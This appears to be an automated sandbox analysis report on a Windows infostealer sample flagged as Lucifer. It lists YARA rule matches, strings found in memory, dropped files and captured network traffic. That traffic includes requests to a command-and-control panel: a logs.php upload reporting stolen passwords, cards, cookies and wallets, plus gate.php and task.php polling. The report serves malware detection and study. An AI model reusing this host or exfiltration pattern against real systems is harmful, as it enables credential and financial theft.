Source: 5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000013063000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130D0000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.000000001301E000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000013046000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130A8000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130ED000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: 5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000013063000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130D0000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.000000001301E000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000013046000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130A8000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130ED000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: 5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000013063000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.000000001301E000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130A8000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130ED000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000013063000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130D0000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.000000001301E000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000013046000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130A8000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002C72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002C72000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000013165000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 0000000A.00000002.375551818.00000176E62AE000.00000004.00000800.00020000.00000000.sdmp, Chrome_History.txt.0.drString found in binary or memory: https://support.google.com/chrome/answer/111996?visit_id=637962485686793996-3320600880&p=update_erro
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002C72000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000013165000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 0000000A.00000002.375551818.00000176E62AE000.00000004.00000800.00020000.00000000.sdmp, Chrome_History.txt.0.drString found in binary or memory: https://support.google.com/chrome/answer/6315198?product=
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002C72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome?p=upda
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002C72000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 0000000A.00000002.375551818.00000176E62AE000.00000004.00000800.00020000.00000000.sdmp, Chrome_History.txt.0.drString found in binary or memory: https://support.google.com/chrome?p=update_error
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.539503355.000000001313D000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000013165000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome?p=update_errorFix
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002C72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/instal
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002C72000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000013165000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 0000000A.00000002.375551818.00000176E62AE000.00000004.00000800.00020000.00000000.sdmp, Chrome_History.txt.0.drString found in binary or memory: https://support.google.com/installer/?product=
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000013063000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130D0000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.000000001301E000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000013046000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130A8000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002C72000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 0000000A.00000002.375551818.00000176E62AE000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 0000000A.00000003.355858128.00000176FEEB2000.00000004.00000020.00020000.00000000.sdmp, Chrome_History.txt.0.drString found in binary or memory: https://www.google.com/intl/en_uk/chrome/
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000131A9000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.000000001313D000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000013165000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en_uk/chrome/Google
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000131B6000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.000000001314A000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.000000001317D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en_uk/chrome/https://www.google.com/intl/en_uk/chrome/https://www.google
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002C72000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000013165000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 0000000A.00000002.375551818.00000176E62AE000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 0000000A.00000003.355858128.00000176FEEB2000.00000004.00000020.00020000.00000000.sdmp, Chrome_History.txt.0.drString found in binary or memory: https://www.google.com/intl/en_uk/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrows
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002C72000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000013165000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 0000000A.00000002.375551818.00000176E62AE000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 0000000A.00000003.355858128.00000176FEEB2000.00000004.00000020.00020000.00000000.sdmp, Chrome_History.txt.0.drString found in binary or memory: https://www.google.com/search?q=chrome&oq=chrome&aqs=chrome..69i57j0j5l3j69i60l3.2663j0j4&sourceid=c
Source: unknown | HTTP traffic detected: POST /logs.php?hwid=CH65FCCAB88D&Passwords=0&CreditCards=0&Cookies=0&AutoFill=0&Wallets=0 HTTP/1.1 | Content-Type: multipart/form-data; boundary=---------------------8dafd8eef66f49d | Host: panel.cheater-zone.com | Content-Length: 791547 | Expect: 100-continue
Source: unknown | DNS traffic detected: queries for: ip-api.com
Source: global traffic | HTTP traffic detected: GET /json/ HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /json/ HTTP/1.1 | Host: ip-api.com
Source: global traffic | HTTP traffic detected: GET /gate.php?hwid=CH65FCCAB88D HTTP/1.1 | Host: panel.cheater-zone.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1 | Host: panel.cheater-zone.com
Source: global traffic | HTTP traffic detected: GET /gate.php?hwid=CH65FCCAB88D HTTP/1.1 | Host: panel.cheater-zone.com
Source: global traffic | HTTP traffic detected: GET /task.php?hwid=CH65FCCAB88D HTTP/1.1 | Host: panel.cheater-zone.com | Connection: Keep-Alive

E-Banking Fraud

Source: Yara match | File source: 5VXh2VBmA0.exe, type: SAMPLE
Source: Yara match | File source: 0.0.5VXh2VBmA0.exe.7c5ae8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.5VXh2VBmA0.exe.762203.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.5VXh2VBmA0.exe.760000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.update_232309.exe.12e81c98.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.update_232309.exe.12e1ddb0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.255220986.0000000000762000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.380375902.0000000012E1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 5VXh2VBmA0.exe PID: 6016, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: update_232309.exe PID: 2108, type: MEMORYSTR

System Summary

Source: 5VXh2VBmA0.exe, type: SAMPLE | Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers | Author: ditekSHen
Source: 5VXh2VBmA0.exe, type: SAMPLE | Matched rule: Windows_Trojan_Lucifer_ce9d4cc8 | Author: unknown
Source: 10.0.Zip.exe.176e4530000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lucifer_ce9d4cc8 | Author: unknown
Source: 0.2.5VXh2VBmA0.exe.2cb6f08.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lucifer_ce9d4cc8 | Author: unknown
Source: 0.0.5VXh2VBmA0.exe.7c5ae8.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers | Author: ditekSHen
Source: 0.0.5VXh2VBmA0.exe.7c5ae8.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lucifer_ce9d4cc8 | Author: unknown
Source: 0.0.5VXh2VBmA0.exe.762203.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers | Author: ditekSHen
Source: 0.0.5VXh2VBmA0.exe.762203.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lucifer_ce9d4cc8 | Author: unknown
Source: 0.0.5VXh2VBmA0.exe.760000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers | Author: ditekSHen
Source: 0.0.5VXh2VBmA0.exe.760000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lucifer_ce9d4cc8 | Author: unknown
Source: 11.2.update_232309.exe.12e81c98.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers | Author: ditekSHen
Source: 11.2.update_232309.exe.12e81c98.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lucifer_ce9d4cc8 | Author: unknown
Source: 11.2.update_232309.exe.12e1ddb0.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers | Author: ditekSHen
Source: 11.2.update_232309.exe.12e1ddb0.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lucifer_ce9d4cc8 | Author: unknown
Source: 00000000.00000002.527402882.0000000002CA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lucifer_ce9d4cc8 | Author: unknown
Source: 00000000.00000000.255220986.0000000000762000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lucifer_ce9d4cc8 | Author: unknown
Source: 0000000A.00000000.306320250.00000176E4532000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lucifer_ce9d4cc8 | Author: unknown
Source: 0000000B.00000002.380375902.0000000012E1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lucifer_ce9d4cc8 | Author: unknown
Source: C:\Users\user\AppData\Local\Temp\Zip.exe, type: DROPPED | Matched rule: Windows_Trojan_Lucifer_ce9d4cc8 | Author: unknown
Source: 5VXh2VBmA0.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 5VXh2VBmA0.exe, type: SAMPLE | Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 5VXh2VBmA0.exe, type: SAMPLE | Matched rule: Windows_Trojan_Lucifer_ce9d4cc8 reference_sample = 1c63d83084d84d9269e3ce164c2f28438eadf723d46372064fe509fb08f94c3c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lucifer, fingerprint = 77c86dfbbd4fb113dabf6016f22d879322357de8ea4a8a598ce9fba761419c55, id = ce9d4cc8-8f16-4272-a54b-e500d4edea9b, last_modified = 2022-04-12
Source: 10.0.Zip.exe.176e4530000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lucifer_ce9d4cc8 reference_sample = 1c63d83084d84d9269e3ce164c2f28438eadf723d46372064fe509fb08f94c3c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lucifer, fingerprint = 77c86dfbbd4fb113dabf6016f22d879322357de8ea4a8a598ce9fba761419c55, id = ce9d4cc8-8f16-4272-a54b-e500d4edea9b, last_modified = 2022-04-12
Source: 0.2.5VXh2VBmA0.exe.2cb6f08.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lucifer_ce9d4cc8 reference_sample = 1c63d83084d84d9269e3ce164c2f28438eadf723d46372064fe509fb08f94c3c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lucifer, fingerprint = 77c86dfbbd4fb113dabf6016f22d879322357de8ea4a8a598ce9fba761419c55, id = ce9d4cc8-8f16-4272-a54b-e500d4edea9b, last_modified = 2022-04-12
Source: 0.0.5VXh2VBmA0.exe.7c5ae8.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 0.0.5VXh2VBmA0.exe.7c5ae8.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lucifer_ce9d4cc8 reference_sample = 1c63d83084d84d9269e3ce164c2f28438eadf723d46372064fe509fb08f94c3c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lucifer, fingerprint = 77c86dfbbd4fb113dabf6016f22d879322357de8ea4a8a598ce9fba761419c55, id = ce9d4cc8-8f16-4272-a54b-e500d4edea9b, last_modified = 2022-04-12
Source: 0.0.5VXh2VBmA0.exe.762203.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 0.0.5VXh2VBmA0.exe.762203.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lucifer_ce9d4cc8 reference_sample = 1c63d83084d84d9269e3ce164c2f28438eadf723d46372064fe509fb08f94c3c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lucifer, fingerprint = 77c86dfbbd4fb113dabf6016f22d879322357de8ea4a8a598ce9fba761419c55, id = ce9d4cc8-8f16-4272-a54b-e500d4edea9b, last_modified = 2022-04-12
Source: 0.0.5VXh2VBmA0.exe.760000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 0.0.5VXh2VBmA0.exe.760000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lucifer_ce9d4cc8 reference_sample = 1c63d83084d84d9269e3ce164c2f28438eadf723d46372064fe509fb08f94c3c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lucifer, fingerprint = 77c86dfbbd4fb113dabf6016f22d879322357de8ea4a8a598ce9fba761419c55, id = ce9d4cc8-8f16-4272-a54b-e500d4edea9b, last_modified = 2022-04-12
Source: 11.2.update_232309.exe.12e81c98.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 11.2.update_232309.exe.12e81c98.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lucifer_ce9d4cc8 reference_sample = 1c63d83084d84d9269e3ce164c2f28438eadf723d46372064fe509fb08f94c3c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lucifer, fingerprint = 77c86dfbbd4fb113dabf6016f22d879322357de8ea4a8a598ce9fba761419c55, id = ce9d4cc8-8f16-4272-a54b-e500d4edea9b, last_modified = 2022-04-12
Source: 11.2.update_232309.exe.12e1ddb0.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 11.2.update_232309.exe.12e1ddb0.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lucifer_ce9d4cc8 reference_sample = 1c63d83084d84d9269e3ce164c2f28438eadf723d46372064fe509fb08f94c3c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lucifer, fingerprint = 77c86dfbbd4fb113dabf6016f22d879322357de8ea4a8a598ce9fba761419c55, id = ce9d4cc8-8f16-4272-a54b-e500d4edea9b, last_modified = 2022-04-12
Source: 00000000.00000002.527402882.0000000002CA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lucifer_ce9d4cc8 reference_sample = 1c63d83084d84d9269e3ce164c2f28438eadf723d46372064fe509fb08f94c3c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lucifer, fingerprint = 77c86dfbbd4fb113dabf6016f22d879322357de8ea4a8a598ce9fba761419c55, id = ce9d4cc8-8f16-4272-a54b-e500d4edea9b, last_modified = 2022-04-12
Source: 00000000.00000000.255220986.0000000000762000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lucifer_ce9d4cc8 reference_sample = 1c63d83084d84d9269e3ce164c2f28438eadf723d46372064fe509fb08f94c3c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lucifer, fingerprint = 77c86dfbbd4fb113dabf6016f22d879322357de8ea4a8a598ce9fba761419c55, id = ce9d4cc8-8f16-4272-a54b-e500d4edea9b, last_modified = 2022-04-12
Source: 0000000A.00000000.306320250.00000176E4532000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lucifer_ce9d4cc8 reference_sample = 1c63d83084d84d9269e3ce164c2f28438eadf723d46372064fe509fb08f94c3c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lucifer, fingerprint = 77c86dfbbd4fb113dabf6016f22d879322357de8ea4a8a598ce9fba761419c55, id = ce9d4cc8-8f16-4272-a54b-e500d4edea9b, last_modified = 2022-04-12
Source: 0000000B.00000002.380375902.0000000012E1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lucifer_ce9d4cc8 reference_sample = 1c63d83084d84d9269e3ce164c2f28438eadf723d46372064fe509fb08f94c3c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lucifer, fingerprint = 77c86dfbbd4fb113dabf6016f22d879322357de8ea4a8a598ce9fba761419c55, id = ce9d4cc8-8f16-4272-a54b-e500d4edea9b, last_modified = 2022-04-12
Source: C:\Users\user\AppData\Local\Temp\Zip.exe, type: DROPPED | Matched rule: Windows_Trojan_Lucifer_ce9d4cc8 reference_sample = 1c63d83084d84d9269e3ce164c2f28438eadf723d46372064fe509fb08f94c3c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lucifer, fingerprint = 77c86dfbbd4fb113dabf6016f22d879322357de8ea4a8a598ce9fba761419c55, id = ce9d4cc8-8f16-4272-a54b-e500d4edea9b, last_modified = 2022-04-12
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe | Code function: 0_2_00007FFBAD3A2CF6
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe | Code function: 0_2_00007FFBAD393510
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe | Code function: 0_2_00007FFBAD3934B0
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe | Code function: 0_2_00007FFBAD3941C0
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe | Code function: 0_2_00007FFBAD3A3AA2
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe | Code function: 0_2_00007FFBAD39A283
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exe | Code function: 10_2_00007FFBAD3A2D26
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exe | Code function: 10_2_00007FFBAD3A3AD2
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exe | Code function: 10_2_00007FFBAD393370
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exe | Code function: 11_2_00007FFBAD3B2CF6
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exe | Code function: 11_2_00007FFBAD3A3510
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exe | Code function: 11_2_00007FFBAD3B3AA2
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exe | Code function: 11_2_00007FFBAD3A42AE
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exe | Code function: 11_2_00007FFBAD3AA283
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exe | Code function: 12_2_00007FFBAD372CF6
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exe | Code function: 12_2_00007FFBAD363510
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exe | Code function: 12_2_00007FFBAD373AA2
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exe | Code function: 12_2_00007FFBAD3642AE
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exe | Code function: 12_2_00007FFBAD36A283
                    Source: 5VXh2VBmA0.exe, 00000000.00000000.255220986.0000000000762000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameNewtonsoft.Json.dll4 vs 5VXh2VBmA0.exe
                    Source: 5VXh2VBmA0.exe, 00000000.00000000.255220986.0000000000762000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameZip.exe( vs 5VXh2VBmA0.exe
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002D95000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamemscorlib.dllT vs 5VXh2VBmA0.exe
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002D95000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename vs 5VXh2VBmA0.exe
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002D95000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ,\\StringFileInfo\\040904B0\\OriginalFilename vs 5VXh2VBmA0.exe
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002D95000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.VisualBasic.DLLT vs 5VXh2VBmA0.exe
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002D95000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.dllT vs 5VXh2VBmA0.exe
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002D95000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Core.dllT vs 5VXh2VBmA0.exe
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002D95000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Windows.Forms.dllT vs 5VXh2VBmA0.exe
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002D95000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Drawing.dllT vs 5VXh2VBmA0.exe
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002D95000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Configuration.dllT vs 5VXh2VBmA0.exe
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002D95000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Xml.dllT vs 5VXh2VBmA0.exe
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002D95000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Runtime.Remoting.dllT vs 5VXh2VBmA0.exe
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002D95000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Web.Extensions.dllT vs 5VXh2VBmA0.exe
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002D95000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ,\\StringFileInfo\\000004B0\\OriginalFilename vs 5VXh2VBmA0.exe
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002D95000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Web.dllT vs 5VXh2VBmA0.exe
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002D95000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Management.dllT vs 5VXh2VBmA0.exe
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002D95000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCustomMarshalers.dllT vs 5VXh2VBmA0.exe
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002CA9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameZip.exe( vs 5VXh2VBmA0.exe
                    Source: 5VXh2VBmA0.exe, 00000000.00000000.255311659.00000000007E6000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameupdate_windows10.exeD vs 5VXh2VBmA0.exe
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.524251422.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs 5VXh2VBmA0.exe
                    Source: 5VXh2VBmA0.exe | Binary or memory string: OriginalFilenameNewtonsoft.Json.dll4 vs 5VXh2VBmA0.exe
                    Source: 5VXh2VBmA0.exe | Binary or memory string: OriginalFilenameZip.exe( vs 5VXh2VBmA0.exe
                    Source: 5VXh2VBmA0.exe | Binary or memory string: OriginalFilenameupdate_windows10.exeD vs 5VXh2VBmA0.exe
                    Source: 5VXh2VBmA0.exe | ReversingLabs: Detection: 80%
                    Source: 5VXh2VBmA0.exe | Virustotal: Detection: 60%
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe | File read: C:\Users\user\Desktop\5VXh2VBmA0.exe
                    Source: 5VXh2VBmA0.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
